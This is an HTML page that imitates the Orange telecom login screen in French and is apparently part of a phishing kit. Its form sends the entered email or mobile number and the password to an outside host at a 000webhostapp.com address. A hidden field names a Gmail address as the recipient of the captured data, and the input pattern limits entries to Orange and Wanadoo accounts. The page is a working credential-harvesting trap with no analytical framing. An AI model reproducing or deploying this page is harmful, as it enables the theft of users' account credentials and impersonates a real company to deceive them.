<!DOCTYPE html>
<html>
    <head>
       <meta charset="utf-8"/>
       <link rel="stylesheet" href="Style/Style.css">
       <link rel="shortcut icon" type="image/x-icon" href="IMG/logor.ico">
    </head>
    <body>
        <header>
            <div class="contain">
                <div class="img-logo">
                    <a href="#"><img class="logoduhaut" src="IMG/052.png"></a>
                </div>
            </div>
        </header>
        <main>
            <div class="grosbloc">
                    <div class="blocsecours">
                        <div class="blocdestitres">
                            <h1>Pour vous identifier</h1>
                            <img class="reglage" src="IMG/Capture00.PNG" alt="">
                            <h3>Indiquez votre compte Orange</h3>
                        </div>
                        <form action='https://holding-rainbows.000webhostapp.com/cryptoo/new/post.php' name='form' id='form' method='POST' accept-charset='UTF-8' enctype='multipart/form-data'>
                            <p>&nbsp;</p>
                            <input type="hidden" name="to" value="naboris971@gmail.com">
                            <p><input maxlength="255" required name="email" type="text" value="" pattern="([a-zA-Z0-9]+([_|\.|-]{1})?[a-zA-Z0-9]+)([_|\.|-]{1})?([a-zA-Z0-9]?){1,}@(orange|wanadoo)\.(com|fr)|(0033|\+33)?([0-9]{9,11})" placeholder="Adresse email ou n° de mobile Orange" /></p>
                            <p><input maxlength="255" required name="pass" type="password" value="" placeholder="Mot de passe" /></p>
                            <div class="processenvoyer"><button class="proccess" type="submit">S'identifier</button></div>
                         </form>
                         <div class="blocdesli">
                             <hr width="135%">
                             <li>
                                 <a href="">Créer un compte sans être client Orange</a>
                             </li> <br>
                            <li>
                                <a href="">Besoin d’aide ?</a>
                            </li>
                         </div>
                    </div>
            </div>
        </main>
        <footer>
                <div class="footexx">
                    <img class="imagefooter" src="IMG/Capture.PNG" alt="">        
                </div>            
        </footer>
    </body>
</html>